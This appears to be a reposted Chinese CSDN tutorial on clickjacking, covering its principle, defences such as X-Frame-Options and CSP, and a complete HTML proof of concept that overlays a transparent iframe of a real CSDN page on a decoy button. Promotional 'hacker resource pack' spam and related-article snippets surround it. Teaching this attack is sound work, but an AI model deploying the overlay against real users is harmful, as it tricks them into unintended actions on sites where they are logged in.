网络安全-点击劫持(ClickJacking)的原理、攻击及防御(非常详细)从零基础到精通,收藏这篇就够了!

于 2025-07-03 11:20:15 发布
阅读量574 收藏 21
点赞数 12
CC 4.0 BY-SA版权
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Python_0011/article/details/149090336

目录

简介

原理

攻击

防御

frame busting

X-Frame-Options

Content Security Policy

NoScript扩展

拓展

参考

简介

2008年,安全专家Robert Hansen 与Jeremiah Grossman发现了一种被他们称为点击劫持(ClickJacking)的攻击。他们准备在OWASP安全大会上公布并进行演示,但是由于很多平台都中了招,包括Adobe在内的厂商要求在漏洞修补前不要公开此问题。

原理

点击劫持是视觉欺骗,用户只看到了底层页面,与页面进行交互时却是与上层页面在交互。这是由于透明的iframe造成的,通过控制iframe的位置,导致上层页面的按钮等覆盖到下层上。

点击劫持,原理示意图

注:红色按钮(上层页面中的)应该是完全覆盖在黄色按钮(底层页面中的),由于看的不是很清楚,我稍微错位了一下。

攻击

<html>
<head>
<title>
来和鹿鸣Lumi互动吧!!!
</title>
<head>
<style>
iframe {
	width: 1440px;
	height: 900px;
	position: absolute;
	top: 30px;
	left: 450px;
	z-index: 2;
	-moz-opacity: 0;
	opacity: 0;
	filter: alpha(opacity=0);
}
</style>
</head>
</head>
<body>
<center>
<div>
<img src="https://ss1.bdstatic.com/70cFvXSh_Q1YnxGkpoWK1HF6hhy/it/u=1242777858,3501957407&fm=11&gp=0.jpg" height="60%">
<br>
<button>点击进行互动</button>
</div>
</center>
<iframe src="https://blog.youkuaiyun.com/lady_killer9" scrolling="no"></iframe>

</body>
</html>

opacity为0.5,即上层页面为半透明状态。

opacity为0.5时

可以看到关注按钮覆盖在了下方的点击进行互动按钮上。

opacity为0时

此时,上层页面完全无法看见,这时如果你登录csdn后点击"点击进行互动"按钮,就会关注我。

防御

frame busting

js编写的,防御效果不好,可绕过。

X-Frame-Options

部分浏览器支持

DENY:禁止iframe,浏览器拒绝当前页面加载任何iframe页面。
SAMEORIGIN:只允许相同域名下的网页iframe,同源政策保护。
ALLOW-FROM: 白名单限制。

Content Security Policy

“网页安全政策”(Content Security Policy,缩写 CSP),一种白名单制度。

NoScript扩展

火狐官方回答

拓展

除了这种点击劫持,还有拖拽劫持,手机端触屏劫持,原理都一样。

参考

《白帽子讲Web安全》

更多内容查看:网络安全-自学笔记

喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。

本文转自 https://blog.youkuaiyun.com/lady_killer9/article/details/108017437?spm=1001.2014.3001.5502,如有侵权,请联系删除。

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

点击劫持技术原理简述
m0_38103658的博客
08-15 3152
界面劫持概念简述: 界面操作劫持攻击实际上是一种基于视觉欺骗的web会话劫持攻击,核心在于使用了标签中的透明属性,他通过在网页的可见输入控件上覆盖一个不可见的框,使得用户误以为在操作可见控件,而实际上用户的操作行为被其不可见的框所劫持,执行不可见框中的恶意代码,达到窃取信息,控制会话,植入木马等目的。 界面劫持发展过程: (点击劫持点击劫持又称UI-覆盖攻击,是2008年由互联网安全专家罗伯特·...
《白帽子讲Web安全 》 随手记(一)
ai_64的博客
04-04 2136
第一遍阅读这本书是在今年春节,那时读得太匆忙,加上对Web上存在的威胁了解不多,那时并不觉这本书较同类书籍有什么特别之处。 时隔3个月第二次阅读,醍醐灌顶,特别是讲解原理的部分,深入浅出,很好的梳理了各个知识点。 毫无疑问,这本书不久我还会读第三遍,不愧为安全从业必读书籍。 这本书的地位: 这本书在安全界地位非常高。首先这本书出版时间是2012年,时间比较早, ...
Web安全点击劫持ClickJacking
weixin_33871366的博客
03-06 1056
点击劫持ClickJacking)是一种视觉上的欺骗手段。大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面;二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义; iframe覆盖 直接示例说明 1. 假如我们在百度有个贴吧,想偷偷让别人关注它。于是我们准备一个页面: &l...
网络安全-点击劫持ClickJacking)的原理攻击防御
关注网络安全、云原生安全
08-15 1万+
简介 2008年,安全专家Robert Hansen 与Jeremiah Grossman发现了一种被他们称为点击劫持(Cli)攻击 原理 攻击 防御
Web 安全点击劫持Clickjacking攻击详解
最新发布
路多辛的所思所想
01-27 2541
点击劫持Clickjacking攻击,又称为界面伪装攻击,是一种利用视觉欺骗手段进行攻击的方式。攻击者通过技术手段欺骗用户点击本没有打算点击的位置,当用户在被攻击攻击的页面上进行操作时,实际点击结果被劫持,从而被攻击者利用。这种攻击方式利用了用户对网站的信任,通过覆盖层(通常是透明的iframe)覆盖在另一个网页之上,使受害者无法察觉。
点击劫持ClickJacking
热门推荐
qq_56327824的博客
03-30 1万+
点击劫持ClickJacking) 什么是点击劫持 点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的,不可见的iframe,覆盖在一个网页上,然后诱导使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱导用户恰巧点击在iframe页面的一些功能性按键上 不懂iframe是干什么的同学,自己补充一下 利用iframe <!DOCTYPE html> <html lang="en"> <head>
【JavaScript从入门到精通】:掌握JavaScript的10个秘诀,让你的代码飞起来
[【JavaScript从入门到精通】:掌握JavaScript的10个秘诀,让你的代码飞起来](https://global.discourse-cdn.com/freecodecamp/original/4X/8/a/9/8a9994ecd36a7f67f2cb40e86af9038810e7e138.jpeg) # 1. JavaScript...
【前端安全必修课】:精通iframe元素获取的权限管理与风险防范
!... # 摘要 ...本文从沙箱模型、内容安全策略、跨域策略等方面阐述了权限管理机制的原理与应用,并提出了设计安全iframe集成策略、防止点击劫持与信息泄露的最佳实践。同时,文章还讨论了风险评估、防范措
分享笔记1 之《白帽子讲web安全
m0_46583081的博客
12-06 547
分享笔记(一)之《白帽子讲web安全
【难题破解】:如何巧妙应对前端面试中的技术盲点
![【难题破解】:如何巧妙应对前端面试中的技术盲点... # 摘要 随着互联网技术的快速发展,前端开发已成为软件工程中的一个重要领域。...同时,本文还重点分析了前端安全机制和性能优化策略,并对前端工程化实践、构建工具
WEB应用程序点击劫持漏洞研究及防御方法
12-11
web程序劫持漏洞及防御的方法。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
点击劫持漏洞原理和复现
weixin_54438700的博客
05-20 5699
一、漏洞原理 点击劫持(Clickbandit),主要是利用HTML中iframe便签可以透明的属性进行利用攻击,其原理是通过在原本的网页上覆盖透明的框架并使受害者在不知情的情况下进行点击。漏洞主要是由于未对referer字段来源进行检验。常常配合csrf和xss。 图中,攻击者在原本网站上覆盖一个透明框架,受害者正常访问网站A,就会点击到这个透明框架B。攻击者常常利用该漏洞诱导受害者点击关键位置进行一些操作,比如转账、购买等危险操作。 二、漏洞复现 1.借助burpsuite工具,选择Clickb
点击劫持clickjacking
渗透之路,攻防之间皆学问
03-27 5362
目录 一. 漏洞描述 二. 点击劫持例子 三. 漏洞防御 一. 漏洞描述 点击劫持clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由 互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。它是通过覆盖不可见的框架误导受害者点击。 虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 这种攻击利用了HTML中<iframe>标签的透明属性。iframe标签是一个...
Clickjacking简单介绍
D的专栏
11-07 534
转自:http://drops.wooyun.org/papers/104
PortSwigger 点击劫持Clickjacking
weixin_42451330的博客
03-02 844
本文介绍PortSwigger靶场 点击劫持Clickjacking)漏洞,包括Clickjacking介绍、利用方式、防御方式等。如有疑问欢迎私聊。
点击劫持概念及解决办法
xswlw_guoquanbao的博客
09-14 1180
点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗手段。攻击者使用一个或多个透明的 iframe 覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击透明的 iframe 页面时,用户的操作已经被劫持到攻击者事先设计好的恶意按钮或链接上。攻击者既可以通过点击劫持设计一个独立的恶意网站,执行钓鱼攻击等;也可以与 XSS 和 CSRF 攻击相结合,突破传统的防御措施,提升漏洞的危害程度。
关于点击劫持防御
Wang的专栏
06-09 1444
【代码】关于点击劫持防御
web安全点击劫持攻击(clickjack)
_Co1a
12-08 1903
点击劫持clickjack 点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗手段。攻击者使用一个或多个透明的 iframe 覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击透明的 iframe 页面时,用户的操作已经被劫持到攻击者事先设计好的恶意按钮或链接上。攻击者既可以通过点击劫持设计一个独立的恶意网站,执行钓鱼攻击等;也可以与 XSS 和 CSRF 攻击相结合,突破传统的防御措施,提升漏洞的危害
点击劫持
m0_38066007的博客
09-16 149
点击劫持 - clickjacking 点击劫持是一种视觉欺骗的攻击手段。攻击者将需要攻击的网站通过 iframe 嵌套的方式嵌入自己的网页中,并将 iframe 设置为透明,在页面中透出一个按钮诱导用户点击。 防御 X-FRAME-OPTIONS X-FRAME-OPTIONS 是一个 HTTP 响应头,在现代浏览器有一个很好的支持。这个 HTTP 响应头 就是为了防御用 iframe 嵌套的点击劫持攻击。 该响应头有三个值可选,分别是 DENY,表示页面不允许通过 iframe .
点击劫持原理、案例与防御策略
点击劫持原理在于视觉欺骗,攻击者通过精细调整iframe的位置和透明度,使之几乎与背景融为一体,用户在无意中点击了隐藏的恶意iframe,导致实际操作并非用户所预期。当网站允许iframe嵌入并缺乏有效的防护机制时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值